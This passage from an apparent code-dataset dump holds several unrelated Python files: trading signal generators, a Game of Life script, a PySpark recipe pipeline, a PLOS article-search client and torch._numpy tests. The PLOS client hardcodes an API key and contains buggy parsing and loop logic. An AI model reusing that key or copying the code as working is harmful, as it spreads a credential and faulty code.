_check_frame_columns(X, 'RangeTop', 'RangeBot', 'bid', 'ask')\n y0 = self._ticks_breaks(X)\n\n return y0\n\n\n@signal_generator\nclass PivotsBreakoutDetector(BaseEstimator):\n @staticmethod\n def _tolist(x):\n return [x] if not isinstance(x, (list, tuple)) else x\n\n def __init__(self, resistances, supports):\n self.resistances = self._tolist(resistances)\n self.supports = self._tolist(supports)\n\n def fit(self, X, y, **fit_params):\n return self\n\n def predict(self, x):\n _check_frame_columns(x, 'open', 'close')\n\n t = scols(x, x.shift(1)[['open', 'close']].rename(columns={'open': 'open_1', 'close': 'close_1'}))\n cols = x.columns\n breaks = srows(\n # breaks up levels specified as resistance\n *[pd.Series(+1, t[(t.open_1 < t[ul]) & (t.close_1 < t[ul]) & (t.close > t[ul])].index) for ul in\n self.resistances if ul in cols],\n\n # breaks down levels specified as supports\n *[pd.Series(-1, t[(t.open_1 > t[bl]) & (t.close_1 > t[bl]) & (t.close < t[bl])].index) for bl in\n self.supports if bl in cols],\n keep='last')\n return breaks\n\n\n@signal_generator\nclass CrossingMovings(BaseEstimator):\n def __init__(self, fast, slow, fast_type='sma', slow_type='sma'):\n self.fast = fast\n self.slow = slow\n self.fast_type = fast_type\n self.slow_type = slow_type\n\n def fit(self, x, y, **fit_args):\n return self\n\n def predict(self, x):\n price_col = self.market_info_.column\n fast_ma = smooth(x[price_col], self.fast_type, self.fast)\n slow_ma = smooth(x[price_col], self.slow_type, self.slow)\n\n return srows(\n 
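# +1 where the fast MA crosses above the slow MA, -1 where it crosses below\n            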
pd.Series(+1, crossup(fast_ma, slow_ma)),\n            pd.Series(-1, crossdown(fast_ma, slow_ma))\n        )\n\n\n@signal_generator\nclass Rsi(BaseEstimator):\n    """\n    Classical RSI entries generator\n    """\n\n    def __init__(self, period, lower=25, upper=75, smoother='sma'):\n        self.period = period\n        self.upper = upper\n        self.lower = lower\n        self.smoother = smoother\n\n    def fit(self, x, y, **fit_args):\n        return self\n\n    def predict(self, x):\n        price_col = self.market_info_.column\n        r = rsi(x[price_col], self.period, smoother=self.smoother)\n        return srows(pd.Series(+1, crossup(r, self.lower)), pd.Series(-1, crossdown(r, self.upper)))\n\n\n@signal_generator\nclass OsiMomentum(BaseEstimator):\n    """\n    Outstretched momentum contrarian generator\n\n    The idea is to mark rising and falling momentum and then calculate an exponential moving average based on the sum\n    of the different momentum moves.\n\n    The steps can be summed up as follows:\n\n    - Select a momentum lookback and a moving average lookback. By default we can use 3 and 5.\n\n    - Create two columns called the Positive Stretch and the Negative Stretch,\n      where the first one has 1's if the current closing price is greater than the closing price 3 periods ago\n      and the other one has 1's if the current closing price is lower than the closing price 3 periods ago.\n\n    - Sum the latest three positive and negative stretches and subtract the results from each other.\n      This is called the Raw Outstretch.\n\n    - Finally, to get the Outstretched Indicator, we take the 5-period exponential moving average of the Raw Outstretch.\n\n    """\n\n    def __init__(self, period, smoothing, threshold=0.05):\n        """\n        :param period: period of momentum\n        :param smoothing: period of ema smoothing\n        :param threshold: threshold for entries. The indicator's maximum absolute value is period, so we generate\n                          long entries when the indicator crosses below the lower bound -period*(1-T) and\n                          short entries when it crosses above the upper bound +period*(1-T)\n        """\n        self.period = period\n        self.smoothing = smoothing\n        self.threshold = threshold\n        if threshold > 1:\n            raise ValueError(f'Threshold parameter {threshold} exceeds 1 !')\n\n    def fit(self, x, y, **fit_args):\n        return self\n\n    def predict(self, x):\n        price_col = self.market_info_.column\n        c = x[price_col]\n\n        pos = (c > c.shift(self.period)) + 0\n        neg = (c < c.shift(self.period)) + 0\n        osi = apply_to_frame(ema, pos.rolling(self.period).sum() - neg.rolling(self.period).sum(), self.smoothing)\n\n        kt = self.period * (1 - self.threshold)\n        return srows(\n            pd.Series(+1, osi[(osi.shift(2) > -kt) & (osi.shift(1) > -kt) & (osi <= -kt)].index),\n            pd.Series(-1, osi[(osi.shift(2) < +kt) & (osi.shift(1) < +kt) & (osi >= +kt)].index)\n        )\n\n\n@signal_generator\nclass InternalBarStrength(BaseEstimator):\n    """\n    Internal bar strength mean reverting generator.\n    when:\n     | close is > (high - T) -> -1\n     | close is < (low + T) -> +1\n\n    T in (0 ... 1/2)\n    """\n\n    def __init__(self, timeframe, threshold, tz='UTC'):\n        self.timeframe = timeframe\n        self.threshold = threshold\n        self.tz = tz\n        self.exact_time = True\n        if threshold >= 0.5 or threshold <= 0:\n            raise ValueError(f'Threshold parameter {threshold} must be in (0 ... 
0.5) range !')\n\n    def fit(self, x, y, **fit_args):\n        return self\n\n    def predict(self, x):\n        _check_frame_columns(x, 'open', 'close', 'high', 'low')\n\n        xf = ohlc_resample(x, self.timeframe, resample_tz=self.tz)\n\n        # on next bar opening\n        self.exact_time = True\n        ibs = ((xf.close - xf.low) / (xf.high - xf.low)).shift(1)\n\n        return srows(\n            pd.Series(+1, ibs[ibs < self.threshold].index),\n            pd.Series(-1, ibs[ibs > 1 - self.threshold].index)\n        )\n\n\n@signal_generator\nclass Equilibrium(BaseEstimator):\n    """\n    - Calculate a simple N-period moving average of the market price.\n    - Subtract the current market price from its moving average.\n    - Calculate an N-period exponential moving average on the subtracted values.\n\n    The result is the N-period Equilibrium Indicator that we will use to generate mean-reverting signals.\n    """\n\n    def __init__(self, period, threshold, smoother='sma'):\n        self.period = period\n        self.smoother = smoother\n        self.threshold = threshold\n\n    def fit(self, x, y, **kwargs):\n        return self\n\n    def predict(self, x):\n        c = x[self.market_info_.column]\n        k1 = smooth(c, self.smoother, self.period)\n        dK = smooth(k1 - c, 'ema', self.period)\n\n        return srows(\n            pd.Series(-1, dK[\n                ((dK.shift(2) < +self.threshold) & ((dK.shift(1) < +self.threshold) & (dK > +self.threshold)))\n            ].index),\n\n            pd.Series(+1, dK[\n                ((dK.shift(2) > -self.threshold) & ((dK.shift(1) > -self.threshold) & (dK < -self.threshold)))\n            ].index)\n        )\n\n\n@signal_generator\nclass WalkForwardTest(BaseEstimator):\n    """\n    Walk Forward Test\n    """\n\n    def __init__(self, estimator: BaseEstimator, train_period=4, test_period=1, units='W'):\n        """\n        Create new WFT using provided estimator and train/test windows\n        By default it uses 4 weeks for training and 1 week for prediction\n        """\n        if estimator is None or not isinstance(estimator, BaseEstimator):\n            raise ValueError(f"Estimator must be non empty and be derived from BaseEstimator")\n\n        if train_period <= 0 or test_period <= 0:\n            raise ValueError(f"Train and Test periods must be positive numbers: {train_period} / {test_period}")\n\n        self.estimator = estimator\n        self.train_period = train_period\n        self.test_period = test_period\n        self.units = units\n        self.sigs = None\n\n    def fit(self, x: pd.DataFrame, y, **kwargs):\n        self.sigs = pd.Series(dtype='float64')\n        signals = []\n        \n        # - we may want to attach the indicator as an additional column to avoid recalculating it on every chunk\n        # because some indicators (SMA, RSI, ...) 
may have empty data in the beginning\n        # (nans for the first 'period' bars for SMA, for example)\n        if hasattr(self.estimator, 'aux_data'):\n            aux_d = self.estimator.aux_data(x, **kwargs)\n            if aux_d is not None:\n                if isinstance(aux_d, pd.DataFrame):\n                    if [c for c in x.columns if c in aux_d.columns]:\n                        raise ValueError(f"Some aux dataframe column names '{aux_d.columns}' intersect with original dataframe columns !")\n                elif isinstance(aux_d, pd.Series):\n                    if aux_d.name in x.columns:\n                        raise ValueError(f"Aux data series name '{aux_d.name}' intersects with original dataframes columns !")\n                else:\n                    raise ValueError(f"Aux data has unrecognized type '{type(aux_d)}' !")\n\n                # attach aux data \n                x = scols(x.copy(), aux_d)\n        \n        for trn, tst in rolling_forward_test_split(x, self.train_period, self.test_period, units=self.units):\n            self.estimator.fit(x.loc[trn], y, **kwargs)\n            signals.append(self.estimator.predict(x.loc[tst]))\n        self.sigs = srows(*signals)\n        return self\n\n    def predict(self, x):\n        if hasattr(self.estimator, 'exact_time'):\n            self.exact_time = self.estimator.exact_time\n        return self.sigs\n\n    def tracker(self, **kwargs):\n        if hasattr(self.estimator, 'tracker'):\n            return self.estimator.tracker(**kwargs)\n        return None\n","repo_name":"dmarienko/Qube","sub_path":"qube/examples/learn/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":11942,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"8715849475","text":"#---------------------------------------------------------------------------\n\nimport copy\n\nfrom GameOfLife import * # imports all the functions inside GameOfLife.py\nfrom GameParameters import * # imports the parameters to be used here\n\n# thisGen[] & nextGen[] are Python lists that act as 2D matrices holding the data on whether a cell is alive or dead.\n# thisGen[] holds the data for the current generation.\n# nextGen[] holds the data for the next generation as it purely depends on the previous condition i.e. thisGen[] here.\n\nthisGen = []\nnextGen = []\n\n# initGrid() is a function included in library GameOfLife.py which gives \n# the list (which is passed), an initial state which is completely random.\n\ninitGrid(ROWS, COLS, thisGen)\n\n# printGen() is a function included in library GameOfLife.py which prints \n# the generation (2D matrix).\n\n# processNextGen() generates the next generation (next 2D matrix) which is \n# totally dependent upon the previous generation (current generation 2D matrix),\n# and hence both (thisGen[] and nextGen[]) are arguments to this function.\n\n# sleep() is a function in the library "time" which takes arguments in seconds.\n# It produces delay between the previous generation and the next generation.\n\nnextGen = copy.deepcopy(thisGen)\n\nprintGen(ROWS, COLS, thisGen, 0)\n\nfor gens in range(GENERATIONS):\n    processNextGen(ROWS, COLS, thisGen, nextGen)\n    printGen(ROWS, COLS, nextGen, gens)\n    input()\n\n# Once the current generation is done printing, the next generation is\n# processed so that it can be printed out next.\n# Finally thisGen is assigned a copy of nextGen.\n\n    thisGen = copy.deepcopy(nextGen)\n\ninput("Finished. 
Press Enter to quit.")\n","repo_name":"GreatDevelopers/ScriptCAD","sub_path":"Session0/CommentedCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"31536093259","text":"from Task_Base import Tasks as tasks\r\nfrom Get_URL_Data import get_recipe\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.functions import lower, expr, udf, split, current_date\r\nfrom pyspark.sql.types import StringType, IntegerType\r\nfrom datetime import datetime\r\nimport logging\r\nimport logging.handlers\r\n\r\nimport sys\r\nimport os\r\n\r\n# Required job parameters\r\nrecipe_file = sys.argv[1]\r\ntasks_arg = sys.argv[2]\r\nquery_table = sys.argv[3]\r\nargs_length = len(sys.argv)\r\n#recipe_file = 'C:\\\\Users\\\\Dell\\\\Downloads\\\\Recipes\\\\input'\r\n# args_length = 2\r\nif args_length < 2:\r\n    print("Please provide at least 2 arguments as input file location and task to execute")\r\n    exit(1)\r\nelse:\r\n    # tasks_arg = 'load,transform,query'\r\n    tasks_piped = [i.strip().lower() for i in tasks_arg.split(',')]\r\n    if 'query' in tasks_piped:\r\n        # query_table = "select * from recipe_table"\r\n        if len(query_table.strip()) == 0:\r\n            print("Please Provide a valid Sql query for Recipe_table(name, recipe, date_of_execution, difficulty)")\r\n            exit(1)\r\n\r\nprefix = os.path.abspath(recipe_file)\r\nrecipe_parquet_folder = 'Recipe_parquet'\r\nrecipe_parquet_outfile = os.path.join(prefix, 'output', recipe_parquet_folder)\r\n\r\nstart_time = datetime.utcnow()\r\nspark = SparkSession \\\r\n    .builder \\\r\n    .appName("Recipe Data") \\\r\n    .config("hive.exec.dynamic.partition", "true") \\\r\n    .config("hive.exec.dynamic.partition.mode", "nonstrict") \\\r\n    .config("spark.sql.warehouse.dir", recipe_parquet_outfile) \\\r\n    .config("spark.sql.catalogImplementation", "hive") \\\r\n    .enableHiveSupport() \\\r\n    .getOrCreate()\r\n\r\n# This is to fetch Recipe text info from input url\r\nget_recipe_udf = udf(get_recipe, StringType())\r\n\r\n\r\n# to get the total time in Minutes\r\ndef get_total_time(time_str):\r\n    if 'H' in time_str and 'M' in time_str:\r\n        return int(time_str.split('H')[0])*60 + int((time_str.split('H')[1]).split('M')[0])\r\n    else:\r\n        if 'M' in time_str:\r\n            return int(time_str.split('M')[0])\r\n        else:\r\n            return int(time_str.split('H')[0])*60\r\n\r\n\r\n# converting it to udf\r\nget_total_time_udf = udf(get_total_time, IntegerType())\r\n\r\n\r\n# an executor to run some Tasks in a specific order\r\nclass Executor(tasks):\r\n    def __init__(self, task=[]):\r\n        self.task = task\r\n\r\n    def run(self):\r\n        for i in self.task:\r\n            if i == 'load':\r\n                print('load')\r\n                self.load()\r\n            else:\r\n                if i == 'transform':\r\n                    print('transform')\r\n                    self.transform()\r\n                else:\r\n                    if i == 'query':\r\n                        print('query')\r\n                        self.query_table()\r\n                    else:\r\n                        print("Not a Task")\r\n\r\n    def load(self):\r\n        try:\r\n            self.recipe_raw_df = spark.read.json(recipe_file)\r\n\r\n        except Exception as e:\r\n            print("Error - during load")\r\n            self.raise_email(str(e))\r\n            raise e\r\n\r\n    def transform(self):\r\n        try:\r\n            recipe_raw = self.recipe_raw_df.filter(lower(self.recipe_raw_df["ingredients"]).contains("beef")) \\\r\n                .withColumn('cooktime', split(self.recipe_raw_df["cookTime"], 'PT')[1]) \\\r\n                .withColumn('preptime', split(self.recipe_raw_df["prepTime"], 'PT')[1])\r\n\r\n            recipe_raw = recipe_raw.select(\r\n                recipe_raw["name"],\r\n                
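# derive numeric cook/prep minutes and fetch the recipe text via the UDFs defined above\r\n                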
get_total_time_udf(recipe_raw[\"cooktime\"]).alias(\"cookTime\"),\r\n get_total_time_udf(recipe_raw[\"preptime\"]).alias(\"prepTime\"),\r\n get_recipe_udf(recipe_raw[\"url\"]).alias(\"recipe\"),\r\n current_date().alias(\"date_of_execution\")\r\n )\r\n recipe_raw.createOrReplaceTempView(\"recipe_flat_view\")\r\n # recipe_raw.show(20, False)\r\n sql = \"\"\"\r\n select \r\n name,\r\n recipe,\r\n date_of_execution,\r\n case when (cookTime + prepTime) > 60 then 'Hard'\r\n when (cookTime + prepTime) > 30 and (cookTime + prepTime) <= 60 then 'Medium'\r\n when (cookTime + prepTime) <= 30 then 'Easy'\r\n else 'Unknown'\r\n end as difficulty\r\n from recipe_flat_view\r\n \"\"\"\r\n recipe_raw = spark.sql(sql)\r\n recipe_raw.createOrReplaceTempView(\"recipe_flat_view\")\r\n #final_df.printSchema()\r\n spark.sql(\"CREATE DATABASE IF NOT EXISTS mydb\")\r\n spark.sql(\"use mydb\").collect()\r\n spark.sql(\"INSERT INTO Recipe_table PARTITION (difficulty)\\\r\n SELECT name,recipe,date_of_execution,difficulty FROM recipe_flat_view\")\r\n\r\n except Exception as e:\r\n print(\"Error - during transform\")\r\n self.raise_email(str(e))\r\n raise e\r\n\r\n def query_table(self):\r\n try:\r\n spark.sql(\"SHOW DATABASES\").show()\r\n spark.sql(\"use mydb\").collect()\r\n spark.sql(\"SHOW TABLES\").show()\r\n spark.sql(query_table).show(5, False)\r\n\r\n except Exception as e:\r\n print(\"Error - during save\")\r\n self.raise_email(str(e))\r\n raise e\r\n\r\n def raise_email(self, e):\r\n smtp_handler = logging.handlers.SMTPHandler(mailhost=(\"smtp.example.com\", 25),\r\n fromaddr=\"from@example.com\",\r\n toaddrs=\"to@example.com\",\r\n subject=u\"AppName error!\")\r\n\r\n logger = logging.getLogger()\r\n logger.addHandler(smtp_handler)\r\n logger.exception(e)\r\n\r\n\r\ndef create_table():\r\n #recipe_parquet_outfile = 'file:/C:/Users/Dell/Downloads/Recipes/output/Recipe_parquet'\r\n try:\r\n spark.sql(\"CREATE DATABASE IF NOT EXISTS mydb\")\r\n spark.sql(\"SHOW DATABASES\").show()\r\n spark.sql(\"use mydb\").collect()\r\n spark.sql(\"SHOW TABLES\").show()\r\n sql_str = \"CREATE TABLE IF NOT EXISTS Recipe_table \" \\\r\n \"(name STRING, recipe STRING, date_of_execution DATE, difficulty STRING)\" \\\r\n \" USING parquet OPTIONS \" \\\r\n \"(mode 'append',\" \\\r\n \"serialization.format '1',\" \\\r\n \"path \" + \"'\"+recipe_parquet_outfile+\"'\" + \")\" \\\r\n \" PARTITIONED BY (difficulty)\"\r\n spark.sql(sql_str)\r\n spark.sql(\"SHOW TABLES\").show()\r\n\r\n except Exception as e:\r\n print(\"Error - outer main\")\r\n executor.raise_email(str(e))\r\n raise e\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n print(\"log - Job Started. %s\" % (datetime.now().strftime('%m/%d/%Y %H:%M:%S')))\r\n # Task to be run in order\r\n print(tasks_piped)\r\n executor = Executor(tasks_piped)\r\n\r\n try:\r\n create_table()\r\n executor.run()\r\n\r\n except Exception as e:\r\n print(\"Error - outer main\")\r\n executor.raise_email(str(e))\r\n raise e\r\n\r\n end_time = datetime.utcnow()\r\n duration = (end_time - start_time).total_seconds()\r\n print(\"Log - Job Completed. 
%s seconds\" % duration)\r\n","repo_name":"KumarRoshandot/Food-Recipe-Apache-Spark-Python","sub_path":"Recipie_Process.py","file_name":"Recipie_Process.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24699315601","text":"import json\nfrom urllib.request import urlopen\nfrom urllib.parse import quote\nfrom datetime import datetime, timedelta\nimport requests\nfrom bs4 import BeautifulSoup\n\nsearchUrl = 'http://api.plos.org/search?'\njournalUrls = {'PLoS Biology' : 'http://www.plosbiology.org',\n 'PLoS Genetics' : 'http://www.plosgenetics.org',\n 'PLoS Computational Biology' : 'http://www.ploscompbiol.org',\n 'PLoS Medicine' : 'http://www.plosmedicine.org',\n 'PLoS ONE' : 'http://www.plosone.org',\n 'PLoS Neglected Tropical Diseases' : 'http://www.plosntds.org',\n 'PLoS Pathogens' : 'http://www.plospathogens.org'}\napi_key = '&api_key={UnppqeqPjpZEH7nEqkRd}'\n\ndef titleSearch(title=\"Ten Simple Rules\"):\n '''\n args: title - string note: use double quotes\n '''\n return searchUrl + 'q=title:' + title + api_key\n\ndef formatArticleUrl(doi,journal):\n '''\n Format a link to the article page, given it's doi and journal\n '''\n return journalUrls.get(journal) + '/article/info%3Adoi%2F' + doi.replace('/','%2F')\n\n\ndef search(query='*:*'):\n '''\n Basic Solr search functionality.\n This takes in a string or dictionary. If a string is passed, it is assumed to be basic search terms; \n and if a dictionary is passed, the arguments are passed to solr.\n\n Returns a list containing dictionary objects for each article found. \n '''\n\n if isinstance(query,str): \n query = { 'q' : query }\n else:\n if 'q' not in query: query['q'] = '*:*' #make sure we include a 'q' parameter\n query['wt'] = 'json' #make sure the return type is json\n query['fq'] = quote('doc_type:full AND !article_type_facet:\"Issue Image\"') #search only for articles\n query['api_key'] = 'UnppqeqPjpZEH7nEqkRd' # You need to substitute this key value for your own PLoS API key. If you do not have a PLoS API Key, please register for a key at http://api.plos.org/registration/\n \n url = searchUrl;\n\n for part in query:\n url += '%s%s=%s' % ('&' if url is not searchUrl else '',part,query[part])\n print('Making request to',url) #TEST\n r = requests.get(url)\n soup=BeautifulSoup(r.text)\n docs = soup.findAll('doc') \n # generate dictionary { docs ('title' : ,'doi': , 'journal': , 'authors': }}\n mydict = {}\n for i in range(0,len(docs)):\n if docs[i].find('arr',{'name':'author_display'}) == None: continue\n else: \n mydict.setdefault(i,{})\n mydict[i] = {'title':docs[i].find('str',{'name':'title_display'})[i].string,\n 'doi': docs[i].find('str', {'name' : 'id'}).string,\n 'journal': docs[i].find('str',{'name' :'journal'}).string,\n 'date': docs[i].find('date').string,\n 'second_auth': docs[i].find('arr',{'name':'author_display'}).str.string\n }\n \n \n return mydict\n\ndef authorSearch(author='Michael B Eisen', strict=True, limit=10):\n '''\n Search for articles by the given author.\n\n author - the name of the author\n strict - whether or not the search should be strict, e.g. if we search for \"Michael Eisen\" without a strict search,\n we'll find articles with authors named Michael, or Eisen. 
With a strict search, we look for exactly the text \"Michael Eisen\"\n limit - the number of articles to display\t\n '''\n query = {}\n name = quote(author)\n if strict : name = '\"' + name + '\"' \n query['q'] = 'author:' + name\n query['fl'] = 'id,journal,title' #specify the fields we need returned\n query['rows'] = limit\n results = search(query)\n print('Articles by %s:' %(author))\n print('*'*10)\n i=0\n for doc in results:\n print('(%s) %s (%s)' % (i+1,results[doc]['title'],formatArticleUrl(results[doc]['doi'],results[doc]['journal'])))\n\ndef authorViews(author='Michael B Eisen'):\n '''\n Find the total number of views of articles by the given author.\n author - the name of the author to look up\n '''\n results = search({'q' : 'author:\"' + quote(author) + '\"',\n 'rows' : 999999, #SOLR limits to 10 results by default \n 'fl' : 'counter_total_all' #SOLR field containing all time views\n })\n views = 0\n for doc in results:\n views += doc.get('counter_total_all')\n print('%s has %s all time views on PLoS!' % (author,views))\n\ndef graphPubs(start,end,out='publications.csv',query=None):\n '''\n Generate a csv file with the number of publications on each day in the specified range. \n\n start - the start date (inclusive)\n end - the end date (exclusive)\t\n (Dates should be passed in YYYY-MM-DD format.)\n out - name of file to which results should be written.\n query - addition query parameters, e.g. query='journal:\"PLoS ONE\"' would graph PLoS ONE publications\n\n Note that to specify an specific date to SOLR, you must double-quote it; e.g. q=publication_date:\"2009-10-19T20:10:00Z/DAY\".\n To specify a range, surround it with square brackets, e.g. q=[* TO NOW]. \n See http://wiki.apache.org/solr/SolrQuerySyntax#Specifying_a_Query_Parser\n and http://lucene.apache.org/solr/api/org/apache/solr/util/DateMathParser.html\n '''\n if isinstance(out,str): out = open(out,'w')\n \n for day in listDays(start,end):\n q = 'publication_date:\"%s/DAY\"%s' % (day, quote(' AND ' + query if query else ''))\n pubs=len(search({'q' : q, 'rows' : 99999}))\n out.write('%s,%s\\n' % (day.partition('T')[0],pubs))\t\n out.close()\n\ndef pubsOn(day,journal=None):\n '''\n List the articles published on the given day.\n\n day - the day to list publications for, in YYYY-mm-dd format.\n journal - optional journal name to which publications will be restricted.\n '''\n dayFormatted = datetime.strptime(day,'%Y-%m-%d').strftime('%Y-%m-%dT%H:%M:%SZ')\n q = 'publication_date:\"%s/DAY\"%s' %(dayFormatted,quote(' AND journal:\"' + journal + '\"') if journal else '')\n results = search({ 'q' : q, 'fl' : 'title,journal,id', 'rows' : 9999 })\n if len(results) > 0:\n print('Articles published %son %s:' % ('in ' + journal + ' ' if journal else '',day))\n print('*'*10)\n for article in results:\n print('%s) %s (%s)' % (results.index(article) + 1,article.get('title'),formatArticleUrl(article.get('id'),article.get('journal'))))\n else:\n print('No articles were published %son %s:' % ('in ' + journal + ' ' if journal else '',day))\n\ndef listDays(start,end):\n '''\n Helper method to return formatted strings for all the days in the range.\n '''\n start=datetime.strptime(start,'%Y-%m-%d')\n end=datetime.strptime(end,'%Y-%m-%d')\n delta = end - start\n days = []\n for day in range(0,delta.days):\n days.append((start + timedelta(days=day)).strftime('%Y-%m-%dT%H:%M:%SZ'))\n return 
days","repo_name":"mlg3672/PLOS","sub_path":"PLOSget.py","file_name":"PLOSget.py","file_ext":"py","file_size_in_byte":6896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14824234229","text":"# Owner(s): [\"module: dynamo\"]\n\nimport functools\nimport inspect\nfrom unittest import expectedFailure as xfail, skipIf as skip\n\nimport numpy as _np\nimport torch\n\nimport torch._numpy as w\nimport torch._numpy._ufuncs as _ufuncs\nimport torch._numpy._util as _util\nfrom pytest import raises as assert_raises\nfrom torch._numpy.testing import assert_allclose, assert_equal\n\nfrom torch.testing._internal.common_cuda import TEST_CUDA\nfrom torch.testing._internal.common_utils import (\n instantiate_parametrized_tests,\n parametrize,\n run_tests,\n subtest,\n TEST_WITH_TORCHDYNAMO,\n TestCase,\n)\n\n\n# These function receive one array_like arg and return one array_like result\none_arg_funcs = [\n w.asarray,\n w.empty_like,\n w.ones_like,\n w.zeros_like,\n functools.partial(w.full_like, fill_value=42),\n w.corrcoef,\n w.squeeze,\n w.argmax,\n # w.bincount, # XXX: input dtypes\n w.prod,\n w.sum,\n w.real,\n w.imag,\n w.angle,\n w.real_if_close,\n w.isreal,\n w.iscomplex,\n w.isneginf,\n w.isposinf,\n w.i0,\n w.copy,\n w.array,\n w.round,\n w.around,\n w.flip,\n w.vstack,\n w.hstack,\n w.dstack,\n w.column_stack,\n w.row_stack,\n w.flatnonzero,\n]\n\nufunc_names = _ufuncs._unary\nufunc_names.remove(\"invert\") # torch: bitwise_not_cpu not implemented for 'Float'\nufunc_names.remove(\"bitwise_not\")\n\none_arg_funcs += [getattr(_ufuncs, name) for name in ufunc_names]\n\n\n@instantiate_parametrized_tests\nclass TestOneArr(TestCase):\n \"\"\"Base for smoke tests of one-arg functions: (array_like) -> (array_like)\n\n Accepts array_likes, torch.Tensors, w.ndarays; returns an ndarray\n \"\"\"\n\n @parametrize(\"func\", one_arg_funcs)\n def test_asarray_tensor(self, func):\n t = torch.Tensor([[1.0, 2, 3], [4, 5, 6]])\n ta = func(t)\n\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", one_arg_funcs)\n def test_asarray_list(self, func):\n lst = [[1.0, 2, 3], [4, 5, 6]]\n la = func(lst)\n\n assert isinstance(la, w.ndarray)\n\n @parametrize(\"func\", one_arg_funcs)\n def test_asarray_array(self, func):\n a = w.asarray([[1.0, 2, 3], [4, 5, 6]])\n la = func(a)\n\n assert isinstance(la, w.ndarray)\n\n\none_arg_axis_funcs = [\n w.argmax,\n w.argmin,\n w.prod,\n w.sum,\n w.all,\n w.any,\n w.mean,\n w.argsort,\n w.std,\n w.var,\n w.flip,\n]\n\n\n@instantiate_parametrized_tests\nclass TestOneArrAndAxis(TestCase):\n @parametrize(\"func\", one_arg_axis_funcs)\n @parametrize(\"axis\", [0, 1, -1, None])\n def test_andaxis_tensor(self, func, axis):\n t = torch.Tensor([[1.0, 2, 3], [4, 5, 6]])\n ta = func(t, axis=axis)\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", one_arg_axis_funcs)\n @parametrize(\"axis\", [0, 1, -1, None])\n def test_andaxis_list(self, func, axis):\n t = [[1.0, 2, 3], [4, 5, 6]]\n ta = func(t, axis=axis)\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", one_arg_axis_funcs)\n @parametrize(\"axis\", [0, 1, -1, None])\n def test_andaxis_array(self, func, axis):\n t = w.asarray([[1.0, 2, 3], [4, 5, 6]])\n ta = func(t, axis=axis)\n assert isinstance(ta, w.ndarray)\n\n\n@instantiate_parametrized_tests\nclass TestOneArrAndAxesTuple(TestCase):\n @parametrize(\"func\", [w.transpose])\n @parametrize(\"axes\", [(0, 2, 1), (1, 2, 0), None])\n def test_andtuple_tensor(self, func, axes):\n t = torch.ones((1, 2, 3))\n 
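# w.transpose should accept the raw torch.Tensor and return a w.ndarray with the axes permuted\n        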
ta = func(t, axes=axes)\n assert isinstance(ta, w.ndarray)\n\n # a np.transpose -specific test\n if axes is None:\n newshape = (3, 2, 1)\n else:\n newshape = tuple(t.shape[axes[i]] for i in range(w.ndim(t)))\n assert ta.shape == newshape\n\n @parametrize(\"func\", [w.transpose])\n @parametrize(\"axes\", [(0, 2, 1), (1, 2, 0), None])\n def test_andtuple_list(self, func, axes):\n t = [[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]] # shape = (1, 2, 3)\n ta = func(t, axes=axes)\n assert isinstance(ta, w.ndarray)\n\n @parametrize(\"func\", [w.transpose])\n @parametrize(\"axes\", [(0, 2, 1), (1, 2, 0), None])\n def test_andtuple_array(self, func, axes):\n t = w.asarray([[[1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]])\n ta = func(t, axes=axes)\n assert isinstance(ta, w.ndarray)\n\n if axes is None:\n newshape = (3, 2, 1)\n else:\n newshape = tuple(t.shape[axes[i]] for i in range(t.ndim))\n assert ta.shape == newshape\n\n\narr_shape_funcs = [\n w.reshape,\n w.empty_like,\n w.ones_like,\n functools.partial(w.full_like, fill_value=42),\n w.broadcast_to,\n]\n\n\n@instantiate_parametrized_tests\nclass TestOneArrAndShape(TestCase):\n \"\"\"Smoke test of functions (array_like, shape_like) -> array_like\"\"\"\n\n def setUp(self):\n self.shape = (2, 3)\n self.shape_arg_name = {\n w.reshape: \"newshape\",\n } # reshape expects `newshape`\n\n @parametrize(\"func\", arr_shape_funcs)\n def test_andshape_tensor(self, func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n\n shape_dict = {self.shape_arg_name.get(func, \"shape\"): self.shape}\n ta = func(t, **shape_dict)\n assert isinstance(ta, w.ndarray)\n assert ta.shape == self.shape\n\n @parametrize(\"func\", arr_shape_funcs)\n def test_andshape_list(self, func):\n t = [[1, 2, 3], [4, 5, 6]]\n\n shape_dict = {self.shape_arg_name.get(func, \"shape\"): self.shape}\n ta = func(t, **shape_dict)\n assert isinstance(ta, w.ndarray)\n assert ta.shape == self.shape\n\n @parametrize(\"func\", arr_shape_funcs)\n def test_andshape_array(self, func):\n t = w.asarray([[1, 2, 3], [4, 5, 6]])\n\n shape_dict = {self.shape_arg_name.get(func, \"shape\"): self.shape}\n ta = func(t, **shape_dict)\n assert isinstance(ta, w.ndarray)\n assert ta.shape == self.shape\n\n\none_arg_scalar_funcs = [(w.size, _np.size), (w.shape, _np.shape), (w.ndim, _np.ndim)]\none_arg_scalar_funcs_xfail = [\n (w.size, _np.size),\n subtest(\n (w.shape, _np.shape), decorators=[xfail] if TEST_WITH_TORCHDYNAMO else []\n ), # XXX fails under dynamo\n (w.ndim, _np.ndim),\n]\n\n\n@instantiate_parametrized_tests\nclass TestOneArrToScalar(TestCase):\n \"\"\"Smoke test of functions (array_like) -> scalar or python object.\"\"\"\n\n @parametrize(\"func, np_func\", one_arg_scalar_funcs)\n def test_toscalar_tensor(self, func, np_func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n tn = np_func(_np.asarray(t))\n\n assert not isinstance(ta, w.ndarray)\n assert ta == tn\n\n @parametrize(\"func, np_func\", one_arg_scalar_funcs_xfail)\n def test_toscalar_list(self, func, np_func):\n t = [[1, 